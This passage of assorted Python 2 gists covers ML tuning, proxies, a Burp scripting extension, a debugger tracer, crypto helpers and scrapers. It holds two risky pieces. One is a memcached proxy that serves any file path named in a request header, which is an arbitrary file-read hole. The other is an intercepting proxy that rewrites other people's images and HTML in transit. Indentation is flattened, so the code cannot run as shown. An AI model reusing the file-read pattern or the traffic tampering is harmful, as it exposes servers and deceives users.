df = df.sort('bytes', ascending=False)
return df
if __name__ == "__main__":
print extract(sys.argv[1])
```
#### File: hard-gists/6e20dba959277bd9af77/snippet.py
```python
import dataiku
import pandas as pd, numpy as np
from dataiku import pandasutils as pdu
from sklearn.metrics import roc_auc_score
import xgboost as xgb
from hyperopt import hp, fmin, tpe, STATUS_OK, Trials
train = dataiku.Dataset("train").get_dataframe()
valid = dataiku.Dataset("valid").get_dataframe()
y_train = train.target
y_valid = valid.target
del train["target"]
del valid["target"]
def objective(space):
clf = xgb.XGBClassifier(n_estimators = 10000,
max_depth = int(space['max_depth']),
min_child_weight = space['min_child_weight'],
subsample = space['subsample'])
eval_set = [( train, y_train), ( valid, y_valid)]
clf.fit(train, y_train,
eval_set=eval_set, eval_metric="auc",
early_stopping_rounds=30)
pred = clf.predict_proba(valid)[:,1]
auc = roc_auc_score(y_valid, pred)
print "SCORE:", auc
return{'loss':1-auc, 'status': STATUS_OK }
space ={
'max_depth': hp.quniform("x_max_depth", 5, 30, 1),
'min_child_weight': hp.quniform ('x_min_child', 1, 10, 1),
'subsample': hp.uniform ('x_subsample', 0.8, 1)
}
trials = Trials()
best = fmin(fn=objective,
space=space,
algo=tpe.suggest,
max_evals=100,
trials=trials)
print best
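# Illustrative follow-up (an addition, not part of the original gist): retrain a
# single model with the best hyperparameters reported by fmin. The 'x_*' keys
# come from the labels used in the search space above, and hp.quniform returns
# floats, so max_depth is cast back to int.
final_clf = xgb.XGBClassifier(n_estimators=10000,
                              max_depth=int(best['x_max_depth']),
                              min_child_weight=best['x_min_child'],
                              subsample=best['x_subsample'])
final_clf.fit(train, y_train,
              eval_set=[(train, y_train), (valid, y_valid)],
              eval_metric="auc", early_stopping_rounds=30)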
```
#### File: hard-gists/701904/snippet.py
```python
import memcache, urllib, os
import SocketServer, SimpleHTTPServer
from BaseHTTPServer import HTTPServer
from SocketServer import ThreadingMixIn
PORT = 9876
DEBUG = False
MEMCACHED = ['127.0.0.1:11211']
class Proxy(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
if None != self.headers['X-Memcached-Path']:
path = self.headers['X-Memcached-Path']+self.path
if os.path.isfile(path):
try:
self.copyfile(urllib.urlopen(path), self.wfile)
except IOError:
if DEBUG:
print "Error: cannot write stream"
f = open(path, 'rb')
mc.set(self.headers['X-Memcached-Key'], f.read(), int(self.headers['X-Memcached-Expires']))
f.close()
if DEBUG:
print path+" stored for "+self.headers['X-Memcached-Expires']+"s"
else:
if DEBUG:
print path+" not found or is a directory"
def finish(self):
try:
SimpleHTTPServer.SimpleHTTPRequestHandler.finish(self)
except IOError, e:
if e.errno != 32 and DEBUG:
print 'Error: broken pipe'
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
if __name__ == '__main__':
mc = memcache.Client(MEMCACHED, debug=0)
httpd = ThreadedHTTPServer(('', PORT), Proxy)
httpd.daemon_threads = True
httpd.allow_reuse_address = 1
if DEBUG:
print "Serving at port", PORT
httpd.serve_forever()
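# Example request (illustrative, not part of the original gist): the proxy reads
# the file at X-Memcached-Path + request path, streams it back, and stores the
# bytes in memcached under X-Memcached-Key for X-Memcached-Expires seconds.
#
#   curl -H "X-Memcached-Path: /var/www" \
#        -H "X-Memcached-Key: static/logo.png" \
#        -H "X-Memcached-Expires: 300" \
#        http://localhost:9876/static/logo.png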
```
#### File: hard-gists/7026954/snippet.py
```python
from java.awt import Font
from javax.swing import JScrollPane, JTextPane
from javax.swing.text import SimpleAttributeSet
from burp import IBurpExtender, IExtensionStateListener, IHttpListener, ITab
import base64
import traceback
class BurpExtender(IBurpExtender, IExtensionStateListener, IHttpListener, ITab):
def registerExtenderCallbacks(self, callbacks):
self.callbacks = callbacks
self.helpers = callbacks.helpers
self.scriptpane = JTextPane()
self.scriptpane.setFont(Font('Monospaced', Font.PLAIN, 11))
self.scrollpane = JScrollPane()
self.scrollpane.setViewportView(self.scriptpane)
self._code = compile('', '<string>', 'exec')
self._script = ''
script = callbacks.loadExtensionSetting('script')
if script:
script = base64.b64decode(script)
self.scriptpane.document.insertString(
self.scriptpane.document.length,
script,
SimpleAttributeSet())
self._script = script
self._code = compile(script, '<string>', 'exec')
callbacks.registerExtensionStateListener(self)
callbacks.registerHttpListener(self)
callbacks.customizeUiComponent(self.getUiComponent())
callbacks.addSuiteTab(self)
self.scriptpane.requestFocus()
def extensionUnloaded(self):
try:
self.callbacks.saveExtensionSetting(
'script', base64.b64encode(self._script))
except Exception:
traceback.print_exc(file=self.callbacks.getStderr())
return
def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
try:
globals_ = {}
locals_ = {'extender': self,
'callbacks': self.callbacks,
'helpers': self.helpers,
'toolFlag': toolFlag,
'messageIsRequest': messageIsRequest,
'messageInfo': messageInfo
}
exec(self.script, globals_, locals_)
except Exception:
traceback.print_exc(file=self.callbacks.getStderr())
return
def getTabCaption(self):
return 'Script'
def getUiComponent(self):
return self.scrollpane
@property
def script(self):
end = self.scriptpane.document.length
_script = self.scriptpane.document.getText(0, end)
if _script == self._script:
return self._code
self._script = _script
self._code = compile(_script, '<string>', 'exec')
return self._code
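# Example content for the Script tab (an illustrative sketch, not part of the
# original gist): the exec() call above exposes 'helpers', 'messageInfo' and
# 'messageIsRequest' as locals, so a pasted script can rewrite requests, e.g.:
#
#   if messageIsRequest:
#       analyzed = helpers.analyzeRequest(messageInfo)
#       headers = list(analyzed.getHeaders())
#       headers.append('X-Scripted: 1')
#       body = messageInfo.getRequest()[analyzed.getBodyOffset():]
#       messageInfo.setRequest(helpers.buildHttpMessage(headers, body))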
```
#### File: hard-gists/706573/snippet.py
```python
from struct import unpack
import Image
tag_types = { 0 : 'End',
1 : 'Byte',
2 : 'Short',
3 : 'Int',
4 : 'Long',
5 : 'Float',
6 : 'Double',
7 : 'Byte array',
8 : 'String',
9 : 'List',
10 : 'Compound'}
# Read number and type of list items and print them
def read_list_payload(chunk):
list_item_type = ord(chunk.read(1))
list_length = unpack('>l', chunk.read(4))[0]
print "%d items of type %s" % (list_length, tag_types[list_item_type])
def read_byte(chunk):
return ord(chunk.read(1))
def read_short(chunk):
return unpack('>h', chunk.read(2))[0]
def read_int(chunk):
return unpack('>l', chunk.read(4))[0]
def read_long(chunk):
return unpack('>q', chunk.read(8))[0]
def read_byte_array(chunk):
length = read_int(chunk)
print "Array length: %d" % length
payload = chunk.read(length)
return payload
def read_compound(chunk):
payload = []
tag = read_tag(chunk)
payload.append(tag)
tag_type = tag[0]
while (tag_type > 0):
tag = read_tag(chunk)
payload.append(tag)
tag_type = tag[0]
print "Read %d elements in compound" % len(payload)
return payload
def read_string(chunk):
str_length = unpack('>h', chunk.read(2))[0]
if (str_length > 0):
str = chunk.read(str_length)
#print "Name: %s" % name
else:
str = None
return str
# Read entire tag
def read_tag(chunk):
type = ord(chunk.read(1)) # Chunk starts with "10" byte
print "Found tag type: %s" % (tag_types[type], )
if (type > 0):
name = read_string(chunk)
if (name != None):
print "Name: %s" % name
else:
name = ''
payload = None
# Read payload of each tag. "0" tag has no payload
if (type == 1):
payload = read_byte(chunk)
elif (type == 2):
payload = read_short(chunk)
elif (type == 3):
payload = read_int(chunk)
elif (type == 4):
payload = read_long(chunk)
elif (type == 5): # no separate float for now
payload = read_long(chunk)
elif (type == 6): # no separate double for now
payload = read_long(chunk)
elif (type == 7):
payload = read_byte_array(chunk)
elif (type == 8):
payload = read_string(chunk)
elif (type == 9):
payload = read_list_payload(chunk)
elif (type == 10):
payload = read_compound(chunk)
return (type, name, payload)
chunk = open('c.-d.18', 'r')
output = read_tag(chunk)
print output[0]
for level in output[2]:
# skip end tags
if (level[0] == 0):
continue
for tag in level[2]:
if (tag[0] == 0):
continue
print tag[1]
if tag[1] == "Blocks":
blocks = tag[2]
print "Blocks retrieved"
print "Blocks count: %d" % len(blocks)
y = 16
# Print map by block ID
for z in range(0, 16):
for x in range (0, 16):
print ord(blocks[ y + ( z * 128 + (x * 128 * 16)) ]),
print
def get_cropbox(x, y):
return (x*16, y*16, x*16 + 16, y*16 + 16)
terrain = Image.open("terrain.png")
stone = terrain.crop(get_cropbox(0,0))
dirt = terrain.crop(get_cropbox(2,0))
gravel = terrain.crop(get_cropbox(3,1))
sand = terrain.crop(get_cropbox(2,1))
coal = terrain.crop(get_cropbox(2,2))
iron = terrain.crop(get_cropbox(1,2))
gold = terrain.crop(get_cropbox(0,2))
redstone = terrain.crop(get_cropbox(3,3))
diamond = terrain.crop(get_cropbox(2,3))
map = Image.new("RGB", (256, 256))
# Draw map
for x in range(0, 16):
for z in range (0, 16):
block_id = ord(blocks[ y + ( z * 128 + (x * 128 * 16)) ])
if block_id == 1:
map.paste(stone, get_cropbox(x, z))
elif block_id == 3:
map.paste(dirt, get_cropbox(x, z))
elif block_id == 13:
map.paste(gravel, get_cropbox(x, z))
elif block_id == 12:
map.paste(sand, get_cropbox(x, z))
elif block_id == 16:
map.paste(coal, get_cropbox(x, z))
elif block_id == 15:
map.paste(iron, get_cropbox(x, z))
elif block_id == 14:
map.paste(gold, get_cropbox(x, z))
elif block_id == 73:
map.paste(redstone, get_cropbox(x, z))
elif block_id == 56:
map.paste(diamond, get_cropbox(x, z))
try:
map.save('.\map.png', 'PNG')
except:
print "Something went wrong on save"
```
#### File: hard-gists/709384/snippet.py
```python
from twisted.internet import reactor
from twisted.web import proxy, server
from twisted.web.resource import Resource
class ProxyResource(Resource):
def getChild(self, path, request):
request.received_headers['x-forwarded-host'] = request.received_headers['host']
if path.startswith('live'):
return proxy.ReverseProxyResource('localhost', 8090, '/live')
return proxy.ReverseProxyResource('localhost', 8001, '/' + path)
if __name__ == '__main__':
root = ProxyResource()
reactor.listenTCP(8000, server.Site(root))
reactor.run()
```
#### File: hard-gists/7183354/snippet.py
```python
import re
import sys
import pefile
from pydbg import *
from pydbg.defines import *
def parseidalog(file):
all_funcs = []
f = open(file)
funcs = f.readlines()
f.close()
for func in funcs:
if 'sub_' in func:
m = re.search('.text .+ 0', func)
addr = '0x'+m.group(0)[6:-2].replace('\n','')
addr = int(addr, 16)
all_funcs.append(addr)
return all_funcs
def printeip(dbg):
eip = dbg.context.Eip
if eip not in most_used_funcs:
most_used_funcs.append(eip)
print 'Break Point Hit ', hex(eip)
return DBG_CONTINUE
def setallbp(dbg):
for fun in all_func:
#print '[+] Setting soft bp on ',hex(fun)
dbg.bp_set(fun,handler=printeip)
return DBG_CONTINUE
def main():
global all_func
global most_used_funcs
most_used_funcs = []
all_func = parseidalog('ida-export.txt')
dbg = pydbg()
exe_file = sys.argv[1]
pe = pefile.PE(exe_file)
dbg = pydbg()
dbg.load(exe_file)
entry = pe.OPTIONAL_HEADER.ImageBase + pe.OPTIONAL_HEADER.AddressOfEntryPoint
dbg.bp_set(entry,handler=setallbp)
dbg.run()
if __name__ == '__main__':
main()
```
#### File: hard-gists/71eda2aab0ee32d19b01/snippet.py
```python
from github import Github
import urllib2
import codecs
import sys
import re
UTF8Writer = codecs.getwriter('utf8')
sys.stdout = UTF8Writer(sys.stdout)
oauthToken = open('.oauthToken', 'r').read()
github = Github(login_or_token=oauthToken)
def print_repo(repo_url):
match = re.match('.+github.com/([^/]+/[^/]+).*', repo_url)
if match is not None:
repo_name = match.group(1)
repo = github.get_repo(repo_name)
for item in [
repo.owner.name,
repo.owner.login,
repo.name,
repo.created_at,
repo.description,
repo.language,
repo.stargazers_count]:
print item if item else '',
print '\t',
print ''
url = 'https://docs.google.com/spreadsheets/d/1XvGfi3TxWm7kuQ0DUqYrO6cxva196UJDxKTxccFqb9U/pub?gid=0&single=true&output=tsv'
response = urllib2.urlopen(url)
tsv = response.read()
lines = tsv.split('\r\n')
keys = lines.pop(0).split('\t')
for line in lines:
values = line.split('\t')
item = dict(zip(keys, values))
repo_url = item['GitHub']
print_repo(repo_url)
```
#### File: hard-gists/7226559/snippet.py
```python
from bs4 import BeautifulSoup
from ConfigParser import ConfigParser
from PySide.QtCore import QThread,Qt,Signal
from PySide.QtGui import QTableWidget,QAbstractItemView,QTableWidgetItem,QBrush,QColor,QApplication
from threading import Thread
import webbrowser
import sys
import time
#from urllib2 import urlopen
import urllib
import urllib2
CONFIGFILE='videoupdater.txt'
SECTION='lastest'
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor())
opener.addheaders=[('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0'),
('Content-Type', 'application/x-www-form-urlencoded')]
VIDEO=[(u'我真的是专家','http://i.youku.com/u/UNDE0MTc5OTI=/videos','UNDE0MTc5OTI','youku'),
(u'sinbasara','http://i.youku.com/u/UMzQ5MjA4NDI4/videos','UMzQ5MjA4NDI4','youku'),
(u'123来呀','http://i.youku.com/u/UMzEwNTUzNjc2/videos','UMzEwNTUzNjc2','youku'),
(u'飞碟说','http://i.youku.com/u/UNTMxOTkwNjA0/videos','UNTMxOTkwNjA0','youku'),
(u'笑打扮哲学','http://i.youku.com/u/UMTM4NDk2MjA=/videos','UMTM4NDk2MjA','youku'),
(u'各种被干','http://i.youku.com/u/UMTQ0NzE0NzI0/videos','UMTQ0NzE0NzI0','youku'),
(u'敖厂长y','http://i.youku.com/u/UMjA0NTg4Njcy/videos','UMjA0NTg4Njcy','youku'),
(u'hawkao','http://i.youku.com/u/UMjU1MzY1ODg=/videos','UMjU1MzY1ODg','youku'),
(u'财经郎眼','http://www.youku.com/show_page/id_zc0818720404711e29013.html','id_zc0818720404711e29013','youkushow'),
(u'天天向上','http://www.youku.com/show_page/id_z9510781e2d4411e296ac.html','id_z9510781e2d4411e296ac','youkushow'),
(u'快乐大本营','http://www.youku.com/show_page/id_zd18a7caa2d4311e29498.html','id_zd18a7caa2d4311e29498','youkushow'),
#(u'老友记','http://www.youku.com/show_page/id_zafef34ece06211e19013.html','id_zafef34ece06211e19013','youkushow'),
(u'晓说','http://www.youku.com/show_page/id_z64feb2249b8211e296da.html','id_z64feb2249b8211e296da','youkushow'),
#(u'娱乐百分百','http://www.youku.com/show_page/id_z8fad81de2d6011e296ac.html','id_z8fad81de2d6011e296ac','youkushow'),
(u'国光帮帮忙','http://www.youku.com/show_page/id_z5ca3d0742d4f11e2b356.html','id_z5ca3d0742d4f11e2b356','youkushow'),
(u'罗辑思维','http://www.youku.com/show_page/id_zc40101545bdc11e2b356.html','id_zc40101545bdc11e2b356','youkushow'),
#(u'十万个冷笑话','http://www.youku.com/show_page/id_z02baa1f0cbcf11e19013.html','id_z02baa1f0cbcf11e19013','youkushow_r'),
(u'壹读','http://i.youku.com/u/UNDY0MTExNTky/videos','UNDY0MTExNTky','youku'),
(u'lukePOST','http://i.youku.com/u/UMzA3NzkwMzI4/videos','UMzA3NzkwMzI4','youku'),
(u'敖厂长t','http://www.tudou.com/home/item_u29083386s0p1.html','item_u29083386s0p1','tudou'),
(u'老湿alwayswet','http://www.tudou.com/home/item_u60173626s0p1.html','item_u60173626s0p1','tudou'),
(u'微播江湖','http://video.56.com/opera/6268.html','opera6268','56'),
(u'反犬TDog','http://i.56.com/fanquan/videos/','fanquan','56i'),
(u'锵锵三人行','http://phtv.ifeng.com/program/qqsrx/','qiangqiangsanrenxing','ifeng'),
(u'康熙来了','http://v.qq.com/variety/column/column_324.html','kangxilaile','qq'),
(u'新闻百科','http://v.qq.com/cover/b/bfal45ox1erftku.html','bfal45ox1erftku','qq2')]
result=[]
class Checker(Thread):
def __init__(self,user,url,id_,type_):
Thread.__init__(self)
self.user=user
self.url=url
self.id_=id_
self.type=type_
def soup(self):
#return BeautifulSoup(urlopen(self.url))
return BeautifulSoup(opener.open(urllib2.Request(self.url)).read())
def update(self):
global config
print self.url
timeaskey = False
if self.type=='youku':
info = self.soup().find("ul", class_="v")
self.title = info.a.get('title')
self.link = info.a.get('href')
self.time = info.find('li', class_="v_pub").span.string
elif self.type=='tudou':
info = self.soup().find("div", class_="txt")
self.link = info.a.get('href')
self.title = info.a.get('title')
self.time = info.find_all('li',limit=2)[1].string[9:].strip()
elif self.type=='56':
info = self.soup().find("div", class_="episode_cnt").find('a')
self.link=info.get('href')
self.title=info.find("span",class_="txt").string
self.time=info.find("span",class_="time").string
elif self.type=='youkushow':
info = self.soup().find("div", id="episode").find('li')
self.link = info.a.get('href')
self.title = info.a.get('title')
self.time=info.label.string
elif self.type=='qq':
info = self.soup().find("div", class_="mod_item")
temp = info.find('h6').a
self.title = temp.get('title')+(','.join([a.string for a in info.find('li', class_='date').find_all('a')]))
self.link = temp.get('href')
#self.time = info.find('span', class_="mod_version").string[5:10]
self.time = info.find('em', class_="mask_txt").string[5:10]
elif self.type=='ifeng':
info = self.soup().find("h2")
self.title = info.span.string
self.link = self.url
self.time = info.em.string[5:10]
timeaskey = True
elif self.type=='youkushow_r':
info = self.soup().find("div", id="episode").find_all('a')[-1]
self.link = info.get('href')
self.title = info.get('title')
self.time = self.title[0:2]
self.title = self.title[2:].strip()
elif self.type=='qq2':
info = self.soup().find('li',class_='item')
self.title = info.find('strong',class_='video_title').string
self.link = self.url
self.time = info.a.get('ut')[5:]
timeaskey = True
elif self.type=='56i':
info = self.soup().find("div", class_="m_v_list_txt")
tmp = info.find('a')
self.link=tmp.get('href')
self.title=tmp.get('title')
self.time=info.find('span').string[3:]
if timeaskey:
self.key=self.time
else:
self.key=self.link
new=False
if not config.has_option(SECTION, self.id_) or not config.get(SECTION, self.id_)==self.key:
config.set(SECTION, self.id_, self.key)
new=True
result.append((self.user,self.time,self.title,self.link,new))
def run(self):
# self.update()
try:
self.update()
except:
print 'error'
result.append((self.user,'error','error',self.url,True))
class Updater(object):
def __init__(self):
global config
config = ConfigParser()
config.read(CONFIGFILE)
if not config.has_section(SECTION):
config.add_section(SECTION)
def getLatest(self):
threads=[]
try:
for (user,url,id_,type_) in VIDEO:
t=Checker(user,url,id_,type_)
t.setDaemon(True)
t.start()
threads.append((t))
for thread in threads:
thread.join(60)
with open(CONFIGFILE,'w') as configfile:
config.write(configfile)
except:
print 'error'
class MyTable(QTableWidget):
def __init__(self, *args):
QTableWidget.__init__(self, *args)
self.thread = VideoThread(self)
self.thread.dataReady.connect(self.update, Qt.QueuedConnection)
self.init()
def init(self):
self.setHorizontalHeaderLabels([u'作者',u'更新时间',u'视频名称',u'视频链接'])
self.setSelectionBehavior(QAbstractItemView.SelectRows)
self.cellClicked.connect(self.clik)
def update(self):
self.setWindowTitle(time.ctime(time.time()))
row=0
for (user,_,_,_) in VIDEO:
# index=0
for index,info in enumerate(result):
if user==info[0]:
self.insertRow(row)
for column in range(4):
item = QTableWidgetItem(info[column])
if info[4]:
item.setForeground(QBrush(QColor(255,0,0)))
self.setItem(row, column, item)
result.pop(index)
break
# index+=1
row +=1
# for info in result:
# self.insertRow(row)
# for column in range(4):
# item = QTableWidgetItem(info[column])
# if info[4]:
# item.setForeground(QBrush(QColor(255,0,0)))
# self.setItem(row, column, item)
# row +=1
self.resizeColumnsToContents()
self.setFixedSize(self.horizontalHeader().length() + 30, self.verticalHeader().length() + 30);
self.show()
def clik(self, row, column):
print 'clicked',row,column
if column == 3 :
item=self.item(row, column)
if item:
url=item.text()
if url.startswith('http://'):
webbrowser.open(url)
if column == 0:
for (user,url,_,_) in VIDEO:
if(self.item(row, column).text()==user):
webbrowser.open(url)
# def closeEvent(self, event):
# event.accept()
# self.thread.terminate()
# sys.exit()
class VideoThread(QThread):
dataReady = Signal(object)
def run(self):
print time.ctime(time.time()),u' - 检查视频更新'
Updater().getLatest()
self.dataReady.emit('')
if __name__=='__main__':
app = QApplication(sys.argv)
table=MyTable(0, 4)
table.thread.start()
app.exec_()
sys.exit()
```
#### File: hard-gists/7228939/snippet.py
```python
from cStringIO import StringIO
from boto.s3.connection import S3Connection
from boto.s3.key import Key as S3Key
from flask import Flask
from flask.ext.restful import Api as FlaskRestfulAPI, Resource, reqparse, abort
from werkzeug.datastructures import FileStorage
## config
ALLOWED_EXTENSIONS = ['jpg', 'jpeg', 'png']
FILE_CONTENT_TYPES = { # these will be used to set the content type of S3 object. It is binary by default.
'jpg': 'image/jpeg',
'jpeg': 'image/jpeg',
'png': 'image/png'
}
AWS_ACCESS_KEY_ID = 'aws-access-key-id'
AWS_SECRET_ACCESS_KEY = 'aws-secret-access-key'
## app initilization
app = Flask(__name__)
app.config.from_object(__name__)
## extensions
api = FlaskRestfulAPI(app)
## Helper Methods
def upload_s3(file, key_name, content_type, bucket_name):
"""Uploads a given StringIO object to S3. Closes the file after upload.
Returns the URL for the object uploaded.
Note: The acl for the file is set as 'public-acl' for the file uploaded.
Keyword Arguments:
file -- StringIO object which needs to be uploaded.
key_name -- key name to be kept in S3.
content_type -- content type that needs to be set for the S3 object.
bucket_name -- name of the bucket where file needs to be uploaded.
"""
# create connection
conn = S3Connection(app.config['AWS_ACCESS_KEY_ID'], app.config['AWS_SECRET_ACCESS_KEY'])
# upload the file after getting the right bucket
bucket = conn.get_bucket(bucket_name)
obj = S3Key(bucket)
obj.name = key_name
obj.content_type = content_type
obj.set_contents_from_string(file.getvalue())
obj.set_acl('public-read')
# close stringio object
file.close()
return obj.generate_url(expires_in=0, query_auth=False)
class FileStorageArgument(reqparse.Argument):
"""This argument class for flask-restful will be used in
all cases where file uploads need to be handled."""
def convert(self, value, op):
if self.type is FileStorage: # only in the case of files
# this is done as self.type(value) makes the name attribute of the
# FileStorage object same as argument name and value is a FileStorage
# object itself anyways
return value
# called so that this argument class will also be useful in
# cases when argument type is not a file.
return super(FileStorageArgument, self).convert(value, op)
## API Endpoints
class UploadImage(Resource):
put_parser = reqparse.RequestParser(argument_class=FileStorageArgument)
put_parser.add_argument('image', required=True, type=FileStorage, location='files')
def put(self):
#TODO: a check on file size needs to be there.
args = self.put_parser.parse_args()
image = args['image']
# check logo extension
extension = image.filename.rsplit('.', 1)[1].lower()
if '.' in image.filename and not extension in app.config['ALLOWED_EXTENSIONS']:
abort(400, message="File extension is not one of our supported types.")
# create a file object of the image
image_file = StringIO()
image.save(image_file)
# upload to s3
key_name = '{0}.{1}'.format('some-name', extension)
content_type = app.config['FILE_CONTENT_TYPES'][extension]
bucket_name = 'bucket-is-me'
logo_url = upload_s3(image_file, key_name, content_type, bucket_name)
return {'logo_url': logo_url}
api.add_resource(UploadImage, '/upload_image')
if __name__ == '__main__':
app.run(debug=True)
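# Example request (illustrative, not part of the original gist): upload a local
# PNG to the endpoint with curl; the JSON response carries the public S3 URL.
#
#   curl -X PUT -F "image=@logo.png" http://localhost:5000/upload_image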
```
#### File: hard-gists/7230348/snippet.py
```python
from Crypto.Cipher import DES3
def _make_des3_encryptor(key, iv):
encryptor = DES3.new(key, DES3.MODE_CBC, iv)
return encryptor
def des3_encrypt(key, iv, data):
encryptor = _make_des3_encryptor(key, iv)
pad_len = 8 - len(data) % 8 # length of padding
padding = chr(pad_len) * pad_len # PKCS5 padding content
data += padding
return encryptor.encrypt(data)
def des3_decrypt(key, iv, data):
encryptor = _make_des3_encryptor(key, iv)
result = encryptor.decrypt(data)
pad_len = ord(result[-1])
result = result[:-pad_len]
return result
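# Illustrative usage sketch (an addition, not part of the original gist). The
# key and IV below are made-up examples: PyCrypto's DES3 takes a 16- or 24-byte
# key and an 8-byte IV, and the helpers above add/strip PKCS5 padding so
# plaintexts of any length round-trip.
example_key = '0123456789abcdef01234567'
example_iv = '12345678'
ciphertext = des3_encrypt(example_key, example_iv, 'secret message')
assert des3_decrypt(example_key, example_iv, ciphertext) == 'secret message'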
```
#### File: hard-gists/7236266/snippet.py
```python
from django.core.management.base import BaseCommand
from mymodule import main
import logging
class Command(BaseCommand):
help = 'Do foo'
def handle(self, *args, **options):
# Setup logging
#
# Verbosity levels:
# 1 - prints nothing
# 2 - Prints log messages for just this module
# 3 or greater - Prints log messages from any module
options['verbosity'] = int(options['verbosity'])
if options['verbosity'] > 1:
if options['verbosity'] == 2:
# use logger for just this module
logger = logging.getLogger('mymodule')
else:
# use root logger
logger = logging.getLogger('')
console = logging.StreamHandler()
console.setLevel(logging.DEBUG)
console.setFormatter(logging.Formatter('%(name)s - %(levelname)s - %(message)s'))
logger.addHandler(console)
main()
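# Example invocation (illustrative; the actual command name is taken from this
# file's name under management/commands/):
#   python manage.py <command_name> --verbosity=2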
```
#### File: hard-gists/7270594/snippet.py
```python
import hashlib
import optparse
import paramiko
from Crypto.PublicKey import RSA
def insert_char_every_n_chars(string, char='\n', every=64):
return char.join(
string[i:i + every] for i in xrange(0, len(string), every))
def get_rsa_key(key_location=None, key_file_obj=None, passphrase=None,
use_pycrypto=False):
key_fobj = key_file_obj or open(key_location)
try:
if use_pycrypto:
key = RSA.importKey(key_fobj, passphrase=passphrase)
else:
key = paramiko.RSAKey.from_private_key(key_fobj,
password=passphrase)
return key
except (paramiko.SSHException, ValueError):
raise Exception(
"Invalid RSA private key file or missing passphrase: %s" %
key_location)
def get_public_key(key):
return ' '.join([key.get_name(), key.get_base64()])
def generate_rsa_key():
return paramiko.RSAKey.generate(2048)
def get_private_rsa_fingerprint(key_location=None, key_file_obj=None,
passphrase=None):
"""
Returns the fingerprint of a private RSA key as a 59-character string (40
characters separated every 2 characters by a ':'). The fingerprint is
computed using the SHA1 (hex) digest of the DER-encoded (pkcs8) RSA private
key.
"""
k = get_rsa_key(key_location=key_location, key_file_obj=key_file_obj,
passphrase=passphrase, use_pycrypto=True)
sha1digest = hashlib.sha1(k.exportKey('DER', pkcs=8)).hexdigest()
fingerprint = insert_char_every_n_chars(sha1digest, ':', 2)
print '>>> RSA Private Key Fingerprint:\n%s' % fingerprint
return fingerprint
def get_public_rsa_fingerprint(key_location=None, key_file_obj=None,
passphrase=None):
"""
Returns the fingerprint of the public portion of an RSA key as a
47-character string (32 characters separated every 2 characters by a ':').
The fingerprint is computed using the MD5 (hex) digest of the DER-encoded
RSA public key.
"""
privkey = get_rsa_key(key_location=key_location, key_file_obj=key_file_obj,
passphrase=passphrase, use_pycrypto=True)
pubkey = privkey.publickey()
md5digest = hashlib.md5(pubkey.exportKey('DER')).hexdigest()
fingerprint = insert_char_every_n_chars(md5digest, ':', 2)
print '>>> RSA Public Key Fingerprint:\n%s' % fingerprint
return fingerprint
def main():
usage = 'usage: ec2fingerprint [options] <rsakey>'
parser = optparse.OptionParser(usage=usage)
parser.add_option("-p", "--public-only", dest="public_only",
action="store_true",
default=False)
parser.add_option("-P", "--private-only", dest="private_only",
action="store_true",
default=False)
opts, args = parser.parse_args()
if len(args) != 1:
parser.error("please specify a single RSA private key file")
path = args[0]
if opts.public_only:
get_public_rsa_fingerprint(key_location=path)
elif opts.private_only:
get_private_rsa_fingerprint(key_location=path)
else:
get_public_rsa_fingerprint(key_location=path)
print
get_private_rsa_fingerprint(key_location=path)
if __name__ == '__main__':
main()
```
#### File: hard-gists/7301722/snippet.py
```python
from twisted.internet import reactor
from twisted.web import proxy, http
from PIL import Image
import StringIO
import zlib
img = Image.open("hoff.png")
class LoggingProxyClient(proxy.ProxyClient):
def __init__(self, command, rest, version, headers, data, father):
del headers["accept-encoding"]
proxy.ProxyClient.__init__(self, command, rest, version, headers, data, father)
self.isImage = False
self.isHtml = False
self.buffer = ""
def handleStatus(self, version, code, message):
proxy.ProxyClient.handleStatus(self, version, code, message)
def handleHeader(self, key, value):
if key.lower() == "content-type" and value.startswith("image/"):
self.isImage = True
self.isHtml = False
self.imageType = value
elif key.lower() == "content-type" and value.startswith("text/html"):
self.isHtml = True
self.isImage = False
proxy.ProxyClient.handleHeader(self, key, value)
def handleResponsePart(self, buffer):
#proxy.ProxyClient.handleResponsePart(self, buffer)
self.buffer += buffer
def handleResponseEnd(self):
if not self._finished:
if self.isImage:
try:
oldBuffer = StringIO.StringIO(self.buffer)
oldImg = Image.open(oldBuffer)
w, h = oldImg.size
if w > 50 and h > 50 and w >= h:
print "Inserting the hoff into image of size: ", str(oldImg.size)
nh = h/2
nw = nh * img.size[0] / img.size[1]
mask = Image.new("RGBA", oldImg.size)
maskData = mask.load()
for x in xrange(0, w):
for y in xrange(0, h):
maskData[x, y] = (0xFF, 0xFF, 0xFF, 0xFF)
newImg = oldImg.copy().convert("RGBA")
pasteImg = img.copy().resize((nw, nh))
newImg = Image.blend(newImg, mask, 0.5)
newImg.paste(pasteImg, (w - nw, h - nh), pasteImg)
newBuffer = StringIO.StringIO()
if self.imageType == "image/png":
newImg.save(newBuffer, "PNG")
elif self.imageType in ("image/jpg", "image/jpeg"):
newImg.save(newBuffer, "JPEG")
self.buffer = newBuffer.getvalue()
self.father.responseHeaders.setRawHeaders("Cache-Control", ["no-cache"])
except Exception as e:
print repr(e)
elif self.isHtml:
print "Hoffifying HTML"
#try:
# newBuffer = zlib.decompress(self.buffer)
#except:
# newBuffer = self.buffer
newBuffer = self.buffer
self.buffer = newBuffer \
.replace("He ", " The Hoff ") \
.replace("She ", " The Hoff ") \
.replace("Jag", " The Hoff ") \
.replace("Han ", " The Hoff ") \
.replace("han ", " The Hoff ") \
.replace("Honom", " The Hoff ") \
.replace("honom", " The Hoff ") \
.replace("Hon ", " The Hoff ") \
.replace("hon ", " The Hoff ") \
.replace("Henne", " The Hoff ") \
.replace("henne", " The Hoff ")
#print self.buffer
self.father.responseHeaders.setRawHeaders("Content-Length", [str(len(self.buffer))])
self.father.write(self.buffer)
proxy.ProxyClient.handleResponseEnd(self)
class LoggingProxyClientFactory(proxy.ProxyClientFactory):
protocol = LoggingProxyClient
class LoggingProxyRequest(proxy.ProxyRequest):
protocols = { "http": LoggingProxyClientFactory }
def process(self):
# when the client isn't aware it's talking to a proxy, it won't send
# the full path to the web server. here we prepend http:// and the server
# host to the uri
if not self.uri.startswith("http://") and not self.uri.startswith("https://"):
self.uri = "http://" + self.getHeader("Host") + self.uri
print "Request from %s for %s" % (self.getClientIP(), self.uri)
